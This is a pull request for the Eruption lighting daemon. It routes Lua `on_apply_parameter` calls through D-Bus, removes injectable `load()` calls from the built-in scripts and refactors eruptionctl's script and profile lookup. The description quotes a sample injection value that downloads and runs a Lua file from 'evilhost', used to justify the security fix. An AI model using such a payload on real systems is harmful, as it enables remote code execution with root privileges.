### PR TITLE
Support on_apply_parameter() in Lua scripts

### DIFF
--- a/Cargo.lock
+++ b/Cargo.lock
@@ -926,6 +926,7 @@ dependencies = [
  "rayon",
  "rust-embed",
  "rustfft",
+ "same-file",
  "serde",
  "serde_json",
  "serialport",

--- a/Cargo.lock
+++ b/Cargo.lock
@@ -1412,6 +1412,7 @@ dependencies = [
  "paste 1.0.9",
  "pretty_assertions",
  "rust-embed",
+ "same-file",
  "serde",
  "serde_json",
  "thiserror",

--- a/eruption/Cargo.toml
+++ b/eruption/Cargo.toml
@@ -101,6 +101,7 @@ i18n-embed = { version = "0.13.4", features = ["fluent-system", "desktop-request
 rust-embed = "6.4.1"
 unic-langid = "0.9.0"
 icecream = "0.1.0"
+same-file = "1"
 
 # ubuntu bionic
 # sysinfo = "=0.14.2"

--- a/eruption/src/profiles.rs
+++ b/eruption/src/profiles.rs
@@ -170,6 +170,21 @@ pub struct Profile {
     pub config: Option<HashMap<String, Vec<ConfigParam>>>,
 }
 
+pub trait FindConfig {
+    fn find_config_param(&self, param: &str) -> Option<&ConfigParam>;
+    fn find_config_param_mut(&mut self, param: &str) -> Option<&mut ConfigParam>;
+}
+
+impl FindConfig for Vec<ConfigParam> {
+    fn find_config_param(&self, param: &str) -> Option<&ConfigParam> {
+        self.iter().find(|p| p.get_name() == param)
+    }
+
+    fn find_config_param_mut(&mut self, param: &str) -> Option<&mut ConfigParam> {
+        self.iter_mut().find(|p| p.get_name() == param)
+    }
+}
+
 macro_rules! get_default_value {
     ($t:ident, $tval:ty, $rval:ty) => {
         paste! {
@@ -202,100 +217,8 @@ macro_rules! get_default_value {
     };
 }
 
-impl Profile {
-    // instantiate default value getters
-    get_default_value!(int, ConfigParam::Int, i64);
-    get_default_value!(float, ConfigParam::Float, f64);
-    get_default_value!(bool, ConfigParam::Bool, bool);
-    get_default_value!(string, ConfigParam::String, String);
-    get_default_value!(color, ConfigParam::Color, u32);
-}
-
-pub trait FindConfig {
-    fn find_config_param(&self, param: &str) -> Option<&ConfigParam>;
-    fn find_config_param_mut(&mut self, param: &str) -> Option<&mut ConfigParam>;
-}
-
-impl FindConfig for Vec<ConfigParam> {
-    fn find_config_param(&self, param: &str) -> Option<&ConfigParam> {
-        for p in self.iter() {
-            match p {
-                ConfigParam::Int { name, .. } => {
-                    if name == param {
-                        return Some(p);
-                    }
-                }
-
-                ConfigParam::Float { name, .. } => {
-                    if name == param {
-                        return Some(p);
-                    }
-                }
-
-                ConfigParam::Bool { name, .. } => {
-                    if name == param {
-                        return Some(p);
-                    }
-                }
-
-                ConfigParam::String { name, .. } => {
-                    if name == param {
-                        return Some(p);
-                    }
-                }
-
-                ConfigParam::Color { name, .. } => {
-                    if name == param {
-                        return Some(p);
-                    }
-                }
-            }
-        }
-
-        None
-    }
-
-    fn find_config_param_mut(&mut self, param: &str) -> Option<&mut ConfigParam> {
-        for p in self.iter_mut() {
-            match p {
-                ConfigParam::Int { name, .. } => {
-                    if name == param {
-                        return Some(p);
-                    }
-                }
-
-                ConfigParam::Float { name, .. } => {
-                    if name == param {
-                        return Some(p);
-                    }
-                }
-
-                ConfigParam::Bool { name, .. } => {
-                    if name == param {
-                        return Some(p);
-                    }
-                }
-
-                ConfigParam::String { name, .. } => {
-                    if name == param {
-                        return Some(p);
-                    }
-                }
-
-                ConfigParam::Color { name, .. } => {
-                    if name == param {
-                        return Some(p);
-                    }
-                }
-            }
-        }
-
-        None
-    }
-}
-
 macro_rules! get_config_value {
-    ($t:ident, $tval:ty, $pval:ty) => {
+    ($t:ident, $pval:ty, $tval:ty) => {
         paste::item! {
             pub fn [<get_ $t _value>](&self, script_name: &str, name: &str) -> Option<&$tval> {
                 if let Some(config) = &self.config {
@@ -338,7 +261,7 @@ macro_rules! get_config_value {
 }
 
 macro_rules! set_config_value {
-    ($t:ident, $tval:ty, $pval:ty) => {
+    ($t:ident, $pval:ty, $tval:ty) => {
         paste::item! {
             pub fn [<set_ $t _value>](&mut self, script_name: &str, name: &str, val: &$tval) -> Result<()> {
                 if let Some(ref mut config) = self.config {
@@ -514,20 +437,25 @@ impl Profile {
         Ok(())
     }
 
-    get_config_value!(int, i64, ConfigParam::Int);
-    set_config_value!(int, i64, ConfigParam::Int);
+    get_default_value!(int, ConfigParam::Int, i64);
+    get_config_value!(int, ConfigParam::Int, i64);
+    set_config_value!(int, ConfigParam::Int, i64);
 
-    get_config_value!(float, f64, ConfigParam::Float);
-    set_config_value!(float, f64, ConfigParam::Float);
+    get_default_value!(float, ConfigParam::Float, f64);
+    get_config_value!(float, ConfigParam::Float, f64);
+    set_config_value!(float, ConfigParam::Float, f64);
 
-    get_config_value!(bool, bool, ConfigParam::Bool);
-    set_config_value!(bool, bool, ConfigParam::Bool);
+    get_default_value!(bool, ConfigParam::Bool, bool);
+    get_config_value!(bool, ConfigParam::Bool, bool);
+    set_config_value!(bool, ConfigParam::Bool, bool);
 
-    get_config_value!(string, str, ConfigParam::String);
-    set_config_value!(string, str, ConfigParam::String);
+    get_default_value!(string, ConfigParam::String, String);
+    get_config_value!(string, ConfigParam::String, str);
+    set_config_value!(string, ConfigParam::String, str);
 
-    get_config_value!(color, u32, ConfigParam::Color);
-    set_config_value!(color, u32, ConfigParam::Color);
+    get_default_value!(color, ConfigParam::Color, u32);
+    get_config_value!(color, ConfigParam::Color, u32);
+    set_config_value!(color, ConfigParam::Color, u32);
 }
 
 impl Default for Profile {

--- a/eruption/src/scripts/dim-zone.lua
+++ b/eruption/src/scripts/dim-zone.lua
@@ -34,10 +34,6 @@ function on_startup(config)
 end
 
 function on_apply_parameter(parameter, value)
-    local update_fn = load("" .. parameter .. " = " .. value)
-
-    update_fn()
-
     -- update state
     on_startup(nil)
 end

--- a/eruption/src/scripts/gaming.lua
+++ b/eruption/src/scripts/gaming.lua
@@ -37,10 +37,6 @@ function on_startup(config)
 end
 
 function on_apply_parameter(parameter, value)
-    local update_fn = load("" .. parameter .. " = " .. value)
-
-    update_fn()
-
     -- update state
     on_startup(nil)
 end

--- a/eruption/src/scripts/linear-gradient.lua
+++ b/eruption/src/scripts/linear-gradient.lua
@@ -37,10 +37,6 @@ function on_startup(config)
 end
 
 function on_apply_parameter(parameter, value)
-    local update_fn = load("" .. parameter .. " = " .. value)
-
-    update_fn()
-
     -- update state
     on_startup(nil)
 end

--- a/eruption/src/scripts/macros.lua
+++ b/eruption/src/scripts/macros.lua
@@ -612,10 +612,6 @@ function on_mouse_wheel(direction)
 end
 
 function on_apply_parameter(parameter, value)
-    local update_fn = load("" .. parameter .. " = " .. value)
-
-    update_fn()
-
     -- update state
     on_startup(nil)
 end

--- a/eruption/src/scripts/solid.lua
+++ b/eruption/src/scripts/solid.lua
@@ -33,10 +33,6 @@ function on_startup(config)
 end
 
 function on_apply_parameter(parameter, value)
-    local update_fn = load("" .. parameter .. " = " .. value)
-
-    update_fn()
-
     -- update state
     for i = 1, canvas_size do
         r, g, b, alpha = color_to_rgba(color_background)

--- a/eruption/src/scripts/stats.lua
+++ b/eruption/src/scripts/stats.lua
@@ -71,12 +71,6 @@ function on_quit()
     store_key_histogram(key_histogram_errors, "key_histogram_errors")
 end
 
-function on_apply_parameter(parameter, value)
-    local update_fn = load("" .. parameter .. " = " .. value)
-
-    update_fn()
-end
-
 function on_key_down(key_index)
     trace("Statistics: Key down: " .. key_index)
 

--- a/eruptionctl/Cargo.toml
+++ b/eruptionctl/Cargo.toml
@@ -62,6 +62,7 @@ i18n-embed-fl = "0.6.4"
 rust-embed = "6.4.1"
 unic-langid = "0.9.0"
 icecream = "0.1.0"
+same-file = "1"
 
 [dev-dependencies]
 pretty_assertions = "1.3.0"

--- a/eruptionctl/src/main.rs
+++ b/eruptionctl/src/main.rs
@@ -40,6 +40,7 @@ use manifest::GetAttr;
 use parking_lot::Mutex;
 use profiles::GetAttr as GetAttrProfile;
 use rust_embed::RustEmbed;
+use same_file::is_same_file;
 use std::sync::atomic::{AtomicBool, Ordering};
 use std::time::Duration;
 use std::{collections::HashMap, path::PathBuf};
@@ -47,6 +48,7 @@ use std::{env, fs, thread};
 use std::{process, sync::Arc};
 
 use crate::color_scheme::{ColorScheme, PywalColorScheme};
+use crate::manifest::Manifest;
 
 mod color_scheme;
 mod constants;
@@ -190,7 +192,8 @@ pub enum Subcommands {
 
     #[clap(about(PARAM_ABOUT.as_str()))]
     Param {
-        script: Option<String>,
+        #[clap(value_name = "SCRIPT")]
+        script_name: Option<String>,
         parameter: Option<String>,
         value: Option<String>,
     },
@@ -538,6 +541,37 @@ pub fn get_script_list() -> Result<Vec<(String, String)>> {
         .collect();
 
     Ok(result)
+}
+
+fn find_script_by_name(
+    scripts: Vec<Manifest>,
+    script_name: &str,
+    load_script_if_file: bool,
+) -> Option<Manifest> {
+    // Find the script specified, either by script name or filename.
+    let script_path = PathBuf::from(script_name);
+    let script_path = if script_path.is_file() {
+        Some(script_path)
+    } else {
+        None
+    };
+
+    if load_script_if_file && script_path.is_some() {
+        let script_path = script_path.clone()?;
+        if let Ok(script) = Manifest::new(&script_path) {
+            return Some(script);
+        }
+    }
+
+    scripts
+        .into_iter()
+        .find(|script| match (script.name == script_name, &script_path) {
+            (true, _) => true,
+            (_, None) => script.script_file.file_name().unwrap().to_string_lossy() == script_name,
+            (_, Some(script_path)) => {
+                is_same_file(&script.script_file, script_path).unwrap_or(false)
+            }
+        })
 }
 
 // global configuration options
@@ -1186,15 +1220,9 @@ pub async fn async_main() -> std::result::Result<(), eyre::Error> {
         // profile related sub-commands
         Subcommands::Profiles { command } => match command {
             ProfilesSubcommands::Edit { profile_name } => {
-                let profiles = util::enumerate_profiles().unwrap_or_else(|_| vec![]);
-
-                if let Some(profile) = profiles
-                    .iter()
-                    .find(|p| *p.profile_file.to_string_lossy() == profile_name)
-                {
-                    util::edit_file(&profile.profile_file)?
-                } else {
-                    eprintln!("No matches found");
+                match util::match_profile_by_name(&profile_name) {
+                    Ok(profile) => util::edit_file(&profile.profile_file)?,
+                    Err(err) => eprintln!("{}", err),
                 }
             }
 
@@ -1209,24 +1237,19 @@ pub async fn async_main() -> std::result::Result<(), eyre::Error> {
             }
 
             ProfilesSubcommands::Info { profile_name } => {
-                let profiles = util::enumerate_profiles().unwrap_or_else(|_| vec![]);
-
-                let empty = HashMap::new();
-
-                if let Some(profile) = profiles
-                    .iter()
-                    .find(|p| *p.profile_file.to_string_lossy() == profile_name)
-                {
-                    println!(
-                        "Profile:\t{} ({})\nDescription:\t{}\nScripts:\t{:?}\n\n{:#?}",
-                        profile.name,
-                        profile.id,
-                        profile.description,
-                        profile.active_scripts,
-                        profile.config.as_ref().unwrap_or(&empty),
-                    );
-                } else {
-                    eprintln!("No matches found");
+                match util::match_profile_by_name(&profile_name) {
+                    Ok(profile) => {
+                        let empty = HashMap::new();
+                        println!(
+                            "Profile:\t{} ({})\nDescription:\t{}\nScripts:\t{:?}\n\n{:#?}",
+                            profile.name,
+                            profile.id,
+                            profile.description,
+                            profile.active_scripts,
+                            profile.config.as_ref().unwrap_or(&empty),
+                        );
+                    }
+                    Err(err) => eprintln!("{}", err),
                 }
             }
         },
@@ -1271,16 +1294,10 @@ pub async fn async_main() -> std::result::Result<(), eyre::Error> {
         // script related sub-commands
         Subcommands::Scripts { command } => match command {
             ScriptsSubcommands::Edit { script_name } => {
-                let scripts = util::enumerate_scripts()?;
-
-                if let Some(script) = scripts
-                    .iter()
-                    .find(|s| *s.script_file.to_string_lossy() == script_name)
-                {
-                    util::edit_file(&script.script_file)?
-                } else {
-                    eprintln!("No matches found");
-                }
+                match find_script_by_name(util::enumerate_scripts()?, &script_name, true) {
+                    Some(manifest) => util::edit_file(&manifest.script_file)?,
+                    None => eprintln!("Script not found."),
+                };
             }
 
             ScriptsSubcommands::List => {
@@ -1290,246 +1307,223 @@ pub async fn async_main() -> std::result::Result<(), eyre::Error> {
             }
 
             ScriptsSubcommands::Info { script_name } => {
-                let scripts = util::enumerate_scripts()?;
-
-                let empty = vec![];
-
-                if let Some(script) = scripts
-                    .iter()
-                    .find(|s| *s.script_file.to_string_lossy() == script_name)
-                {
-                    println!(
-                        "Lua script:\t{} ({})\nDaemon version:\t{}\nAuthor:\t\t{}\nDescription:\t{}\nTags:\t\t{:?}",
-                        script.name,
-                        script.version,
-                        script.min_supported_version,
-                        script.author,
-                        script.description,
-                        script.tags.as_ref().unwrap_or(&empty),
-                    );
-                } else {
-                    eprintln!("No matches found");
+                match find_script_by_name(util::enumerate_scripts()?, &script_name, true) {
+                    Some(script) => {
+                        let empty = vec![];
+                        println!(
+                            "Lua script:\t{} ({})\nDaemon version:\t{}\nAuthor:\t\t{}\nDescription:\t{}\nTags:\t\t{:?}",
+                            script.name,
+                            script.version,
+                            script.min_supported_version,
+                            script.author,
+                            script.description,
+                            script.tags.as_ref().unwrap_or(&empty),
+                        );
+                    }
+                    None => eprintln!("Script not found."),
                 }
             }
         },
 
         // parameter
         Subcommands::Param {
-            script,
+            script_name,
             parameter,
             value,
         } => {
+            let profile_name = get_active_profile().await.map_err(|e| {
+                eprintln!("Could not determine the currently active profile! Is the Eruption daemon running?");
+                e
+            })?;
+
+            let profile = match util::match_profile_by_name(&profile_name) {
+                Ok(profile) => profile,
+                Err(err) => {
+                    eprintln!("Could not load the current profile ({})", profile_name);
+                    eprintln!("{}", err);
+                    return Ok(());
+                }
+            };
+
+            let scripts: Vec<Manifest> = profile
+                .active_scripts
+                .iter()
+                .map(|script_file| match script_file.is_file() {
+                    true => Some(script_file.to_owned()),
+                    false => match util::match_script_file(&script_file) {
+                        Ok(script_file) => Some(script_file),
+                        Err(err) => {
+                            eprintln!("Could not find script {}. {}", script_file.display(), err);
+                            None
+                        }
+                    },
+                })
+                .filter_map(|script_file| script_file)
+                .map(|script_file| match Manifest::new(&script_file) {
+                    Ok(manifest) => Some(manifest),
+                    Err(err) => {
+                        eprintln!(
+                            "Could not process manifest file for script {}. {}",
+                            script_file.display(),
+                            err
+                        );
+                        None
+                    }
+                })
+                .filter_map(|manifest| manifest)
+                .collect();
+
             // determine mode of operation
-            if script.is_none() && parameter.is_none() && value.is_none() {
+            if script_name.is_none() && parameter.is_none() && value.is_none() {
                 // list parameters from all scripts in the currently active profile
-                let profile_name = get_active_profile().await.map_err(|e| {
-                    eprintln!("Could not determine the currently active profile! Is the Eruption daemon running?");
-                    e
-                })?;
 
-                let profiles = util::enumerate_profiles().unwrap_or_else(|_| vec![]);
+                println!(
+                    "Profile:\t{} ({})\nDescription:\t{}\nScripts:\t{:?}\n",
+                    profile.name, profile.id, profile.description, profile.active_scripts,
+                );
 
-                if let Some(profile) = profiles
-                    .iter()
-                    .find(|&p| *p.profile_file.to_string_lossy() == profile_name)
-                {
-                    println!(
-                        "Profile:\t{} ({})\nDescription:\t{}\nScripts:\t{:?}\n",
-                        profile.name, profile.id, profile.description, profile.active_scripts,
-                    );
+                // dump parameters set in .profile file
 
-                    // dump parameters set in .profile file
+                println!("Profile parameters:\n");
 
-                    println!("Profile parameters:\n");
+                let empty = HashMap::new();
 
-                    let empty = HashMap::new();
+                for script in &scripts {
+                    let config = profile.config.as_ref().unwrap_or(&empty);
+                    let config_params = config.get(&script.name);
 
-                    let scripts = util::enumerate_scripts()?;
+                    if let Some(config_params) = config_params {
+                        for config in config_params.iter() {
+                            // read param value
+                            let value = if config.get_value() == config.get_default() {
+                                (&config.get_value()).to_string().normal()
+                            } else {
+                                (&config.get_value()).to_string().bold()
+                            };
+
+                            println!(
+                                "\"{}\" {}: {} (default: {})",
+                                &script.name,
+                                &config.get_name(),
+                                &value,
+                                &config.get_default(),
+                            );
+                        }
+                    }
+                }
+
+                if opts.verbose > 0 {
+                    // dump all available parameters that could be set in the .profile file
+                    println!();
+                    println!("Available parameters:\n");
 
                     for script in &scripts {
-                        if profile.active_scripts.contains(&PathBuf::from(
-                            script.script_file.file_name().unwrap_or_default(),
-                        )) {
-                            let config = profile.config.as_ref().unwrap_or(&empty);
-                            let config_params = config.get(&script.name);
+                        if let Some(config_params) = script.config.as_ref() {
+                            for config in config_params.iter() {
+                                // read param defaults
+                                let value = config.get_default();
 
-                            if let Some(config_params) = config_params {
-                                for config in config_params.iter() {
-                                    // read param value
-                                    let value = if config.get_value() == config.get_default() {
-                                        config.get_value().to_string().normal()
-                                    } else {
-                                        config.get_value().to_string().bold()
-                                    };
-
-                                    println!(
-                                        "\"{}\" {} {} (default: {})",
-                                        &script.name,
-                                        &config.get_name(),
-                                        &value,
-                                        &config.get_default(),
-                                    );
-                                }
+                                println!(
+                                    "\"{}\" {} (default: {})",
+                                    &script.name,
+                                    &config.get_name(),
+                                    &value,
+                                );
                             }
                         }
-                    }
 
-                    if opts.verbose > 0 {
-                        // dump all available parameters that could be set in the .profile file
                         println!();
-                        println!("Available parameters:\n");
-
-                        for script in &scripts {
-                            if profile.active_scripts.contains(&PathBuf::from(
-                                script.script_file.file_name().unwrap_or_default(),
-                            )) {
-                                if let Some(config_params) = script.config.as_ref() {
-                                    for config in config_params.iter() {
-                                        // read param defaults
-                                        let value = config.get_default();
-
-                                        println!(
-                                            "\"{}\" {} (default: {})",
-                                            &script.name,
-                                            &config.get_name(),
-                                            &value,
-                                        );
-                                    }
-                                }
-
-                                println!();
-                            }
-                        }
                     }
-                } else {
-                    eprintln!("Could not load the current profile");
                 }
-            } else if let Some(script) = script {
-                let profile_name = get_active_profile().await.map_err(|e| {
-                    eprintln!("Could not determine the currently active profile! Is the Eruption daemon running?");
-                    e
-                })?;
+            } else if let Some(script_name) = script_name {
+                let script = find_script_by_name(scripts, &script_name, false);
+                let script = match script {
+                    Some(script) => script,
+                    None => {
+                        println!("Script not found.");
+                        return Ok(());
+                    }
+                };
 
                 if let Some(value) = value {
                     // set a parameter from the specified script in the currently active profile
 
                     let parameter = parameter.unwrap();
 
-                    let profiles = util::enumerate_profiles().unwrap_or_else(|_| vec![]);
+                    println!(
+                        "Profile:\t{} ({})\nDescription:\t{}\nScripts:\t{:?}\n",
+                        profile.name, profile.id, profile.description, profile.active_scripts,
+                    );
 
-                    if let Some(profile) = profiles
-                        .iter()
-                        .find(|&p| *p.profile_file.to_string_lossy() == profile_name)
-                    {
-                        println!(
-                            "Profile:\t{} ({})\nDescription:\t{}\nScripts:\t{:?}\n",
-                            profile.name, profile.id, profile.description, profile.active_scripts,
-                        );
+                    // set param value
+                    dbus_client::set_parameter(
+                        &*profile.profile_file.to_string_lossy(),
+                        &*script.script_file.to_string_lossy(),
+                        &parameter,
+                        &value,
+                    )?;
 
-                        let scripts = util::enumerate_scripts()?;
-
-                        for scr in scripts {
-                            if scr.name == script {
-                                // set param value
-                                dbus_client::set_parameter(
-                                    &profile.profile_file.to_string_lossy(),
-                                    &scr.script_file.to_string_lossy(),
-                                    &parameter,
-                                    &value,
-                                )?;
-
-                                println!("\"{}\" {} {}", &scr.name, &parameter, &value.bold(),);
-
-                                break;
-                            }
-                        }
-                    } else {
-                        eprintln!("Could not load the current profile");
-                    }
+                    println!("\"{}\" {} {}", &script.name, &parameter, &value.bold());
                 } else if let Some(parameter) = parameter {
                     // list parameters from the specified script in the currently active profile
 
-                    let profiles = util::enumerate_profiles().unwrap_or_else(|_| vec![]);
+                    let mut found_parameter = false;
 
-                    if let Some(profile) = profiles
-                        .iter()
-                        .find(|&p| *p.profile_file.to_string_lossy() == profile_name)
-                    {
-                        let empty = HashMap::new();
+                    let empty = HashMap::new();
+                    let config = profile.config.as_ref().unwrap_or(&empty);
 
-                        let scripts = util::enumerate_scripts()?;
+                    if let Some(config) = config.get(&script.name) {
+                        let config_param = config
+                            .iter()
+                            .find(|config_param| config_param.get_name() == &parameter);
+                        if let Some(config_param) = config_param {
+                            println!(
+                                "Profile:\t{} ({})\nDescription:\t{}\nScripts:\t{:?}\n",
+                                profile.name,
+                                profile.id,
+                                profile.description,
+                                profile.active_scripts,
+                            );
 
-                        'OUTER_LOOP: for script in scripts {
-                            if profile.active_scripts.contains(&PathBuf::from(
-                                script.script_file.file_name().unwrap_or_default(),
-                            )) {
-                                let config = profile.config.as_ref().unwrap_or(&empty);
-                                if let Some(config) = config.get(&script.name) {
-                                    for config in config.iter() {
-                                        if config.get_name() == &parameter {
-                                            if let Some(value) = &value {
-                                                println!(
-                                                    "Profile:\t{} ({})\nDescription:\t{}\nScripts:\t{:?}\n",
-                                                    profile.name, profile.id, profile.description, profile.active_scripts,
-                                                );
+                            // read param value
+                            println!(
+                                "\"{}\" {} {}",
+                                &script.name,
+                                &config_param.get_name(),
+                                &config_param.get_value().bold(),
+                            );
 
-                                                // set param value
-                                                dbus_client::set_parameter(
-                                                    &profile.profile_file.to_string_lossy(),
-                                                    &script.script_file.to_string_lossy(),
-                                                    &parameter,
-                                                    value,
-                                                )?;
-
-                                                println!(
-                                                    "\"{}\" {} {}",
-                                                    &script.name,
-                                                    &parameter,
-                                                    &value.bold(),
-                                                );
-
-                                                break 'OUTER_LOOP;
-                                            } else {
-                                                println!(
-                                                    "Profile:\t{} ({})\nDescription:\t{}\nScripts:\t{:?}\n",
-                                                    profile.name, profile.id, profile.description, profile.active_scripts,
-                                                );
-
-                                                // read param value
-                                                println!(
-                                                    "\"{}\" {} {}",
-                                                    &script.name,
-                                                    &config.get_name(),
-                                                    &config.get_value().bold(),
-                                                );
-
-                                                break 'OUTER_LOOP;
-                                            }
-                                        }
-                                    }
-                                }
-                            }
+                            found_parameter = true;
                         }
-                    } else {
-                        eprintln!("No matches found");
+                    }
+
+                    // Not all script manifest parameters need be listed in the profile
+                    if !found_parameter {
+                        let what = script.config.unwrap_or_default();
+                        let config_param = what
+                            .iter()
+                            .find(|config_param| config_param.get_name() == &parameter);
+                        match config_param {
+                            Some(config_param) => println!(
+                                "\"{}\" {}; default: {}",
+                                &script.name,
+                                &config_param.get_name().bold(),
+                                &config_param.get_default()
+                            ),
+                            None => println!("No parameter found."),
+                        }
                     }
                 } else {
                     // list parameters from the specified script
                     println!("Dumping all parameters from the specified script:\n");
 
-                    let scripts = util::enumerate_scripts()?;
-
-                    for scr in scripts {
-                        if scr.name == script {
-                            for param in scr.config.unwrap_or_default() {
-                                println!(
-                                    "\"{}\" {} default: {}",
-                                    scr.name,
-                                    param.get_name().bold(),
-                                    param.get_default()
-                                );
-                            }
-                        }
+                    for param in script.config.unwrap_or_default() {
+                        println!(
+                            "\"{}\" {}; default: {}",
+                            &script.name,
+                            &param.get_name().bold(),
+                            &param.get_default()
+                        );
                     }
                 }
             } else {
@@ -1563,7 +1557,8 @@ pub async fn async_main() -> std::result::Result<(), eyre::Error> {
                 let profile_path = PathBuf::from(&profile_name);
 
                 let profile_name = if profile_path.is_file() {
-                    Ok(profile_path)
+                    Ok(profile_path.canonicalize()?)
+                    // use the absolute path, otherwise the pathname will be searched in the profile directory
                 } else {
                     util::match_profile_path(&profile_name)
                 };


### PR DESCRIPTION
- Previously, `on_apply_parameter()` was only called from the `Message::SetParameter` scripting channel message, but nothing send that message.  Now, the `SetParameter` dbus method will send `Message::SetParameter` when it applies the parameter change.
- The (intended?) semantics of `on_apply_parameter` have changed.  Now, the Lua function is only called after the parameter has already been updated in the script, the updated of which is handled outside of the script itself.  This was the only safe way to update the parameter.  The previous stub implementation using `load()` was vulnerable to an injection attack.  E.g., consider a parameter value of `0; load(require("socket.http").request("http://evilhost/evil.lua"))()` (untested).  Granted, this is the nature of arbitrary scripting, but systemd runs eruption as root.  It would be fun to be able to share scripts online without having to worry about unwanted side effects.  Perhaps the Lua VMs can be deprivileged in the future.
- For that same reason, the `load()`s in existing `on_apply_parameter` functions of the built-in scripts have been removed. 
- If a script does not provide the `on_apply_parameter` function, then the script is reloaded just as it was in the previous behavior.  Otherwise, it's assumed the script knows what to do when parameter has changed.
- Some `ConfigParam` code has been cleaned up.  I think a good opportunity exists to simplify the typed params and unify them into a single family of structs.  Another day.
- I probably wrote some dumb Rust code that needlessly copies strings or something.  Sometimes when the code doesn't compile, I just add ampersands and asterisks until it does.
